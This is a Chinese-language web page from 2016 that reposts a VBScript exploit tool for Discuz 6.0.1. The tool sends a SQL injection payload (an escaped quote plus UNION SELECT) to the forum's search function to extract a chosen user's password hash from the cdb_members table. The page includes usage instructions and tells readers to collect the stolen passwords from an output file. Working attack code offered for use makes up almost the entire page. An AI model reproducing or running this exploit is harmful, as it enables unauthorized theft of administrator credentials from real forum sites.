简要咨询咨询QQ网站导航网站搜索手机站点联系我们设为首页加入收藏 

discuz 任意管理员密码漏洞利用工具 vbs代码

来源:易贤网   阅读:2670 次  日期:2016-07-18 15:35:38

温馨提示:易贤网小编为您整理了“discuz 任意管理员密码漏洞利用工具 vbs代码”,方便广大网友查阅!

打算考虑写个python版的,考虑大家的机器环境还是弄了个vbs版 也利于修改

以下是search.inc.php 文件漏洞利用代码VBS版

代码如下:

Dim strUrl,strSite,strPath,strUid

showB()

Set Args = Wscript.Arguments

If Args.Count <> 3 Then

ShowU()

Else

strSite=Args(0)

strPath=Args(1)

strUid=Args(2)

End If

strUrl="action=search&searchid=22%cf' UNION SELECT 1,password,3,password/**/from/**/cdb_members/**/where/**/uid=" & strUid &"/*&do=submit"

Set objXML = CreateObject("Microsoft.XMLHTTP")

objXML.Open "POST",strSite & strPath & "index.php", False

objXML.SetRequestHeader "Accept", "*/*"

objXML.SetRequestHeader "Accept-Language", "zh-cn"

objXML.SetRequestHeader "Content-Type", "application/x-www-form-urlencoded"

objXML.SetRequestHeader "User-Agent", "wap"

objXML.send(strUrl)

wscript.echo(objXML.ResponseText)

Sub showB()

With Wscript

.Echo("+--------------------------=====================------------------------------+")

.Echo("Exploit discuz6.0.1")

.Echo("Code By Safe3")

.Echo("+--------------------------=====================------------------------------+")

End with

End Sub

Sub showU()

With Wscript

.Echo("+--------------------------=====================------------------------------+")

.Echo("用法:")

.Echo(" cscript "&.ScriptName&" site path uid")

.Echo("例子:")

.Echo(" cscript "&.ScriptName&" http://www.example.com/ /forum/ 1 >result.txt")

.Echo("+--------------------------=====================------------------------------+")

.Quit

End with

End Sub

获得的密码大家自己在result.txt中查找

更多信息请查看脚本栏目
点此处就本文及相关问题在本站进行非正式的简要咨询(便捷快速)】     【点此处查询各地各类考试咨询QQ号码及交流群
上一篇:添加网站到安全站点.设置安全站点打开ActiveX时提示.去页眉页脚的vbs代码
下一篇:雷客图 站长安全助手 vbs版代码(asp 木马查找)
易贤网手机网站地址:discuz 任意管理员密码漏洞利用工具 vbs代码
由于各方面情况的不断调整与变化,易贤网提供的所有考试信息和咨询回复仅供参考,敬请考生以权威部门公布的正式信息和咨询为准!